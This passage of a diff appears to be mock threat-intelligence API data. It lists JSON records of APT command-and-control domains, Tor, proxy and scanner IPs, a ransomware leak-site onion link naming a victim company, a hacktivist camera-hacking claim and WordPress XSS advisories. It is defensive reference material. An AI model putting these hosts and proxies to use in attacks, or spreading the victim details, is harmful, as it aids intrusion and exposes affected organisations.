", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "4ffc68d1fd5cd6a2084c8284256be7651aafa84b", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "description": null, + "id": "0a3f9339b944b7976bbbccf6a695592ce97b7523", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": "wehermes.com", + "ipv4": [], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271570168080, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "0a3f9339b944b7976bbbccf6a695592ce97b7523" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0850", + "sectors": [], + "seqUpdate": 17272224279604, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "IR", + "id": "ea7951d222a76335539dfe8774fd24dba6770139", + "isAPT": true, + "name": "Oilrig" + }, + "title": "Oilrig - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-25T03:00:27+03:00" + } + ], + "seqUpdate": 17272224279604 + }, + "hi/threat":{ + "count": 1355, + "items": [ + { + "contacts": [], + "countries": [ + "CA" + ], + 
"createdAt": "2024-09-23T06:16:41+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

2024-09-23 Qilin ransomware attacked Canstar Restorations canstarrestorations[.]com.

Screenshot from Qilin DLS

At present data wasn't posted on a Data Leak Site (DLS). ", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": null + }, + "expertise": [ + "Leak", + "Ransomware", + "AutoReport" + ], + "files": [ + { + "hash": "9f432b3fd71ed9e40ca5e35cb7630d7dd3499245edcee601915011ad0a356ab7", + "mime": "image/png", + "name": "9f432b3fd71ed9e40ca5e35cb7630d7dd3499245edcee601915011ad0a356ab7", + "size": 2895505 + } + ], + "forumsAccounts": [], + "hasIocs": false, + "id": "d4a164b9caecc0d28041bb042bfad1acfb91f77a", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [ + { + "attackPatternId": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "attackTactic": "impact", + "attackType": "enterprise_tactics", + "id": null, + "mitreId": "T1486", + "params": null + } + ], + "oldId": null, + "regions": [ + "america:northern_america" + ], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0616", + "sectors": [ + "real-estate:construction" + ], + "seqUpdate": 17270614084038, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [ + "http://kbsqoivihgdmwczmxkbovk7ss2dcynitwhhfu5yw725dboqo5kthfaad.onion/site/view?uuid=f73f99c9-0a5d-36ff-8fab-36e936caab39" + ], + "targetedCompany": [ + "Canstar Restorations" + ], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": null, + "id": "18c14c0707e5cdaeb7975576fa54a4346d154619", + "isAPT": false, + "name": "Qilin" + }, + "title": "Qilin Ransomware attack on Canstar Restorations", + "toolList": [], + "type": "threat", + "unreliableIndicators": [], + 
"unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T06:16:48+03:00" + }, + { + "contacts": [ + { + "account": "sillycatsfr", + "flag": "fake", + "service": "telegram", + "type": "im" + }, + { + "account": "ftpcat", + "flag": "fake", + "service": "telegram", + "type": "im" + } + ], + "countries": [], + "createdAt": "2024-09-23T11:45:16+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-15", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

Pryx created a Telegram channel on 2024-09-15 named “The daily PRYX”:

 

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "green", + "tlp": "green", + "ttl": null + }, + "expertise": [], + "files": [ + { + "hash": "2cd0d8754286f5482adfa66518aa001daef66d0978a1ca7a7793a6ef9a857eef", + "mime": "image/png", + "name": "2cd0d8754286f5482adfa66518aa001daef66d0978a1ca7a7793a6ef9a857eef", + "size": 377290 + } + ], + "forumsAccounts": [], + "hasIocs": false, + "id": "4b6fd64b149127836d5ad524debf44917befc231", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-1145", + "sectors": [], + "seqUpdate": 17270815547585, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": null, + "id": "3b4ad4eaa284c3a8a4965e71be53959fae00c98a", + "isAPT": false, + "name": "Pryx" + }, + "title": "General information - new contacts", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T11:52:34+03:00" + }, + { + "contacts": [ + { + "account": "@examlpe", + "flag": "fake", + "service": "telegram", + "type": "im" + } + ], + "countries": [], + "createdAt": "2024-09-23T13:04:25+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

On 2024-09-23 in their Telegram channel (hxxps://t[.]me/ServerKillers) Server Killers posted message containing information about possible attack

We hacked South Korean Cameras!\n\nMost of the cameras are located in Seoul, Incheon, Daejeon, Suwon\n\nWe hacked:\n   Cafe Cameras \n   Restaurant Cameras \n   Home Cameras \n   Computer Room Cameras\n   Car Parking Cameras\n   Street Cameras\n   Office Cameras\n   Supermarket Cameras\n\nWe have hacked 100+ South Korean Cameras
\n", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "orange", + "tlp": "amber", + "ttl": null + }, + "expertise": [ + "AutoReport", + "Deface" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": false, + "id": "13aad85a2c8eccce7217be1e16e39486c987bf17", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-1304", + "sectors": [], + "seqUpdate": 17270858675384, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "RU", + "id": "8d22ccb2f4aace36992ce5ec9cf431c138536820", + "isAPT": false, + "name": "Server Killers" + }, + "title": "Server Killers posted message containing data about possible attack", + "toolList": [], + "type": "threat", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T13:04:27+03:00" + } + ], + "seqUpdate": 17270858675384 + }, + "suspicious_ip/tor_node":{ + "count": 252997, + "items": [ + { + "bind": null, + "dateFirstSeen": "2023-03-15T12:03:39+00:00", + "dateLastSeen": "2023-03-15T12:03:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "156.146.57.182", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "156.146.57.182", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360252525000, + 
"source": "check.torproject.org" + }, + { + "bind": null, + "dateFirstSeen": "2023-03-22T06:07:10+00:00", + "dateLastSeen": "2023-03-22T06:07:10+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "188.241.80.46", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "188.241.80.46", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360269562000, + "source": "check.torproject.org" + }, + { + "bind": null, + "dateFirstSeen": "2022-05-02T19:08:51+00:00", + "dateLastSeen": "2022-08-23T07:36:12+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "83.137.158.16", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "83.137.158.16", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360409780000, + "source": "tor_banner" + } + ], + "seqUpdate": 1682360409780000 + }, + "suspicious_ip/open_proxy":{ + "count": 3454691, + "items": [ + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "61.238.12.158", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "HK", + "countryName": null, + "ip": "61.238.12.158", + "provider": null, + "region": null + }, + "oldId": "11aaaac89b10f8863fef7335a1f7839a23c9a710", + "port": 8088, + "portalLink": null, + "seqUpdate": 1460383585066000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "http" + }, + { + 
"anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "1.175.177.135", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TW", + "countryName": null, + "ip": "1.175.177.135", + "provider": null, + "region": null + }, + "oldId": "78001defd30996ea8d4e770730631863bbd67ce9", + "port": 9064, + "portalLink": null, + "seqUpdate": 1460383585071000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "https" + }, + { + "anonymous": "", + "bind": null, + "dateDetected": "2014-10-01T13:46:14+00:00", + "dateFirstSeen": "2014-10-01T13:46:14+00:00", + "dateLastSeen": "2014-10-01T13:46:14+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "61.62.7.209", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TW", + "countryName": null, + "ip": "61.62.7.209", + "provider": null, + "region": null + }, + "oldId": "b3ac84363ff3659472a64dc6c313b5d0b0df4866", + "port": 9064, + "portalLink": null, + "seqUpdate": 1460383585073000, + "source": "free-proxy-list.net", + "sources": [ + "free-proxy-list.net" + ], + "stixGuid": null, + "type": "https" + } + ], + "seqUpdate": 1460383585073000 + }, + "suspicious_ip/socks_proxy":{ + "count": 28086846, + "items": [ + { + "bind": null, + "dateDetected": "2014-11-05T05:00:11+00:00", + "dateFirstSeen": "2014-11-05T05:00:11+00:00", + "dateLastSeen": "2014-11-05T17:00:11+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "114.143.160.66", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "IN", 
+ "countryName": null, + "ip": "114.143.160.66", + "provider": null, + "region": null + }, + "oldId": "a78ecc975e74876300f6ee54d829fabf6e1fc243", + "portalLink": null, + "seqUpdate": 1460491661013000, + "source": "awmproxy", + "stixGuid": null + }, + { + "bind": null, + "dateDetected": "2014-11-05T05:20:03+00:00", + "dateFirstSeen": "2014-11-05T05:20:03+00:00", + "dateLastSeen": "2014-11-05T17:20:03+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "91.185.11.165", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "KZ", + "countryName": null, + "ip": "91.185.11.165", + "provider": null, + "region": null + }, + "oldId": "afa5e3e33a0d78d8dfc06f502400c4c17ffaf33d", + "portalLink": null, + "seqUpdate": 1460491661026000, + "source": "awmproxy", + "stixGuid": null + }, + { + "bind": null, + "dateDetected": "2014-11-05T05:01:06+00:00", + "dateFirstSeen": "2014-11-05T05:01:06+00:00", + "dateLastSeen": "2014-11-05T17:01:06+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "1.46.71.151", + "ipv4": { + "asn": null, + "city": null, + "countryCode": "TH", + "countryName": null, + "ip": "1.46.71.151", + "provider": null, + "region": null + }, + "oldId": "f8eb2e7a96a6d5fa18232b74660a911a1511a435", + "portalLink": null, + "seqUpdate": 1460491661046000, + "source": "awmproxy", + "stixGuid": null + } + ], + "seqUpdate": 1460491661046000 + }, + "suspicious_ip/vpn":{ + "count": 741499, + "items": [ + { + "bind": null, + "dateFirstSeen": "2021-04-22T12:43:38+00:00", + "dateLastSeen": "2021-04-22T12:43:38+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "188.250.243.135", + "ipv4": { + "asn": "AS3243", + "city": null, + "countryCode": "PT", + 
"countryName": null, + "ip": "188.250.243.135", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657409977576, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + }, + { + "bind": null, + "dateFirstSeen": "2021-04-17T12:03:44+00:00", + "dateLastSeen": "2021-04-17T12:03:44+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "52.188.125.80", + "ipv4": { + "asn": "AS8075", + "city": null, + "countryCode": null, + "countryName": null, + "ip": "52.188.125.80", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657409978158, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + }, + { + "bind": null, + "dateFirstSeen": "2020-12-11T13:33:54+00:00", + "dateLastSeen": "2020-12-11T13:33:54+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 90, + "severity": "green", + "tlp": "amber", + "ttl": 2 + }, + "id": "168.119.130.217", + "ipv4": { + "asn": "AS24940", + "city": null, + "countryCode": "DE", + "countryName": null, + "ip": "168.119.130.217", + "provider": null, + "region": null + }, + "names": [ + "SoftEther VPN" + ], + "portalLink": null, + "rules": [ + "vpn_soft_ether" + ], + "seqUpdate": 1671657410005695, + "source": "playbook", + "sources": [ + "playbook" + ], + "types": [ + "self-hosted" + ] + } + ], + "seqUpdate": 1671657410005695 + }, + "suspicious_ip/scanner":{ + "count": 20143973, + "items": [ + { + "bind": null, + "categories": [ + "Brute-Force" + ], + "dateFirstSeen": "2021-08-11T03:30:53+00:00", + "dateLastSeen": "2021-08-11T03:30:53+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + 
"severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "180.180.112.221", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "180.180.112.221", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + }, + { + "bind": null, + "categories": [ + "Brute-Force", + "SSH" + ], + "dateFirstSeen": "2021-08-11T03:51:19+00:00", + "dateLastSeen": "2021-08-11T08:57:51+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "159.89.54.66", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "159.89.54.66", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + }, + { + "bind": null, + "categories": [ + "Brute-Force" + ], + "dateFirstSeen": "2021-08-11T03:30:49+00:00", + "dateLastSeen": "2021-08-11T03:30:49+00:00", + "evaluation": { + "admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "white", + "ttl": 15 + }, + "id": "49.149.72.230", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "49.149.72.230", + "provider": null, + "region": null + }, + "portalLink": null, + "seqUpdate": 1628553600000000, + "sources": [] + } + ], + "seqUpdate": 1628553600000000 + }, + "malware/cnc":{ + "count": 148783, + "items": [ + { + "cnc": "hint09.9966.org", + "dateDetected": "2013-05-31T20:00:00Z", + "dateFirstSeen": "2013-05-31T20:00:00Z", + "dateLastSeen": "2013-05-31T20:00:00Z", + "domain": "hint09.9966.org", + "file": null, + "id": "cb08296b420fcce499ef84edb7ac314970953a00", + "ipv4": [], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 13700304004, + "threatActor": [ + { + "id": "96054da361e4092a5a509862356f9f2541b86e9e", + "name": "NetTraveler" + } + ], + "url": "" + 
}, + { + "cnc": "82.113.19.75", + "dateDetected": "2014-08-06T20:00:00Z", + "dateFirstSeen": "2014-08-06T20:00:00Z", + "dateLastSeen": "2014-08-06T20:00:00Z", + "domain": "", + "file": null, + "id": "d67606f9fb3f81dbddbea74f3231613a742dc397", + "ipv4": [ + { + "asn": "", + "city": "", + "countryCode": "", + "countryName": "", + "ip": "82.113.19.75", + "provider": "", + "region": "" + } + ], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 14073552002, + "threatActor": [ + { + "id": "03cf30aa129ecf2eba833773e10786b1558ac212", + "name": "Turla" + } + ], + "url": "" + }, + { + "cnc": "sofexjordan2014.com", + "dateDetected": "2014-10-21T20:00:00Z", + "dateFirstSeen": "2014-10-21T20:00:00Z", + "dateLastSeen": "2014-10-21T20:00:00Z", + "domain": "sofexjordan2014.com", + "file": null, + "id": "f304865cea057e3bfce2a2f38cbbe0dabaa32728", + "ipv4": [], + "ipv6": [], + "malwareList": [], + "platform": "", + "seqUpdate": 14139216000, + "threatActor": [ + { + "id": "fbde425d47a07be229130d3bd3a61b90d2b090ca", + "name": "APT28" + } + ], + "url": "" + } + ], + "seqUpdate": 14139216000 + }, + "osi/vulnerability":{ + "count": 454062, + "items": [ + { + "affectedSoftware": [ + { + "name": "shrimptest", + "operator": "lt", + "version": "1.0b3" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:04+01:00", + "dateModified": "2015-05-14T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - ShrimpTest 1.0b2 - plugins/plugin-notification.php Unspecified XSS\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + 
"credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/7181", + "id": "WPVDB-ID:7181", + "lastseen": "2018-09-17T17:26:04+01:00", + "mergedCvss": 0, + "modified": "2015-05-14T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944090287, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "ShrimpTest 1.0b2 - plugins/plugin-notification.php Unspecified XSS", + "twitter": [], + "type": "wpvulndb" + }, + { + "affectedSoftware": [ + { + "name": "super-refer-a-friend", + "operator": "lt", + "version": "1.0" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:47+01:00", + "dateModified": "2018-08-28T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - super-refer-a-friend - Full Path Disclosure\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/6620", + "id": "WPVDB-ID:6620", + "lastseen": "2018-09-17T17:26:47+01:00", + 
"mergedCvss": 0, + "modified": "2018-08-28T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944269535, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "super-refer-a-friend - Full Path Disclosure", + "twitter": [], + "type": "wpvulndb" + }, + { + "affectedSoftware": [ + { + "name": "shrimptest", + "operator": "lt", + "version": "1.0b3" + } + ], + "bulletinFamily": "software", + "cpe": [], + "cpeTable": [], + "cveList": [], + "cveListEpss": [], + "cvss": { + "score": 0, + "vector": "NONE" + }, + "cvssAttackVector": "", + "darkweb": [], + "dateLastSeen": "2018-09-17T17:26:03+01:00", + "dateModified": "2015-05-14T22:00:00+01:00", + "datePublished": "2014-07-31T21:00:00+01:00", + "description": "WordPress Vulnerability - ShrimpTest 1.0b2 - plugins/metric-conversion.php Multiple Unspecified XSS\n", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [], + "isFavourite": false, + "isHidden": false + }, + "epss": { + "cve": "", + "date": "0001-01-01T00:00:00Z", + "epss": 0, + "percentile": 0 + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "exploitCount": 0, + "exploitList": [], + "exploitation": [], + "extDescription": "", + "githubLinkList": [], + "hasExploit": false, + "href": "https://wpvulndb.com/vulnerabilities/7180", + "id": "WPVDB-ID:7180", + "lastseen": "2018-09-17T17:26:03+01:00", + "mergedCvss": 0, + "modified": "2015-05-14T22:00:00+01:00", + "portalLink": "", + "provider": "vulners.com", + "published": "2014-07-31T21:00:00+01:00", + "references": [], + "reporter": "wpvulndb", + "seenInTheWild": false, + "seqUpdate": 15677944270178, + "softwareMixed": [], + "threats": [], + "threatsList": [], + "timeLineData": [], + "title": "ShrimpTest 1.0b2 
- plugins/metric-conversion.php Multiple Unspecified XSS", + "twitter": [], + "type": "wpvulndb" + } + ], + "seqUpdate": 15677944270178 + }, + "osi/git_repository":{ + "count": 4, + "items": [ + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "password": 1 + }, + "dateCreated": "2023-07-29T19:15:41+03:00", + "dateDetected": "2024-10-05T22:34:14+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-07-29T19:15:41+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "53e081b81ede4de32383bfc7a274877cad14cca0", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "8b6cd23d023fbc3f2117b5cb9cb1de5ee936e639", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647341 + } + } + ], + "rules": null, + "url": "https://github.com/example/DALILightEngine/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ff4809c63e236267da1987e2f85b6e3b67492cbf", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/AscCommonCommands/AscCommonCommands.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 
455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/AscCommonCommands/AscCommonCommands.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1107c7dc3a868e7d2e28c3d45aedcee685991b8b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/AscCommonCommands/AscCommonCommands.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/AscCommonCommands/AscCommonCommands.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f840db446914b74742a2edc06997a14754b6701b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + 
"ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "d8aa39502e78cf1b7fc693ddc2a8d87584de591d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": 